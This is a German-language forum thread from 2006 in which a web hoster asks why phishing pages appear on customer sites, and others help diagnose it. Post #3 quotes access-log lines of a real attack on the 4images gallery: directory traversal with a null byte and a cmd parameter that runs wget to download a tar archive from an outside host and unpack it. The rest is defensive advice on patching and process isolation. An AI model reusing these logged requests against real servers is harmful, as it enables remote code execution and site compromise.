Apache Sicherheit -> Phishing Seiten

Nachricht

vayia · #1 Beitrag von **vayia** » 01. Sep 2006 14:24

Hallo zusammen,

Ich hab ne Frage zum Apache Server.

Jede virtuelle Domain hat einen eigenen Benutzer und eine eigene Gruppe,
dieser hat auch Schreibrechte, ab und zu taucht nun eine Phishingseite auf diesen Seiten auf, die wohl per HTTP Post raufgeladen wurden.

Die Rechte brauchts leider für die ver. CMS die von den Kunden installiert werden.
Hat da jemand ne Idee?

Gruss Pascal

#2 Beitrag von **klopskuchen** » 01. Sep 2006 15:08

die wohl per HTTP Post raufgeladen wurden.

Meinst du nicht 'PUT'?
Wenn doch 'POST', werden die übermittelten Daten unreichend validiert. Zeig mal ein paar Einträge solcher uploads aus der access.conf.

MfG, Klopskuchen

vayia · #3 Beitrag von **vayia** » 01. Sep 2006 15:12

So was:

81.24.26.57 - - [31/Aug/2006:23:52:00 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=wget%20-o%20../ama.tar%20nusunteu.xhost.ro/am
a.tar;ls%20../ama.tar HTTP/1.1" 200 644 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:27 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=cd%20..;tar%20xvf%20ama.tar HTTP/1.1" 200 633
"-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:37 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=ls%20ama.tar HTTP/1.1" 200 641 "-" "Mozilla/5
.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"
81.24.26.57 - - [31/Aug/2006:23:53:43 +0200] "GET /4images/index.php?template=../../data/tmp_media/b.jpg%00&cmd=tar%20xvf%20ama.tar HTTP/1.1" 200 1622 "-" "M
ozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3"

ich denke das liegt wohl am cms von diesem kunden?

edit:: ist wohl so ein php gallery tool...

#4 Beitrag von **klopskuchen** » 01. Sep 2006 15:28

../../[...]&cmd=wget...

- Ist das Ausführen beliebiger Kommandos vorgesehen?
- Ist das directory-traversal vorgesehen? (Hast du rumänische Kunden?

)
- Was ist das für Software?

MfG, Klopskuchen

vayia · #5 Beitrag von **vayia** » 01. Sep 2006 15:35

Hallo,

Ich denke das ist ne Sicherheitslücke,

http://www.4homepages.de/forum/index.php?topic=11855.0

muss ich wohl updaten. Aber ist halt schwierig. Ich kann ja nicht alle Kundendomains überwachen... Und die können installieren was Sie wollen....

Wie handhabt ihr das so?

#6 Beitrag von **klopskuchen** » 01. Sep 2006 16:00

Und die können installieren was Sie wollen

Wenn eine Kunde kaputte Software fährt und sein Kram zerstört wird, hat er Pech gehabt. Du solltest Kunden voreinander schützen. Und deinen Server vorm Kunden. Solange jemand nur sein eigenes Verzeichnis zerschießt, naja wen juckts, daß ist sein Bier.

MfG, Klopskuchen

vayia · #7 Beitrag von **vayia** » 03. Sep 2006 15:31

Was kann man denn da überprüfen?

Meine Systeme sind Debian Sarge 3.1 und als Verwaltungstool setze ich VHCS ein.
Die System wurden nach VHCS HowTO's erstellt.

Dieser macht virtuelle Hosts in der Apachekonf. Mehr ist da aber glaubs nicht drin.
Kann man die einzelnen Seiten irgendwie von einander schützen?

Die Phishing-Dateien gehören dann der Gruppe www-data.
Jede Domain hat eigentlich eine Gruppe und einen Benutzer mit dem gleichem Namen,
aber der www-data hat da trotzdem Rechte (apache-user?).

Falls jemand n gutes Howto hat würd ich das gerne mal durchchecken.

Danke

#8 Beitrag von **klopskuchen** » 09. Sep 2006 16:12

http://www.php-faq.de/q/q-konfiguration-safe-mode.html
Im Idealfall mod-cgi und su-exec. Ist allerdings etwas langsamer in der Ausführung, weshalb gerade Massenhoster mod-php bevorzugen um mehr Kunden auf eine Kiste klatschen zu können.

MfG, Klopskuchen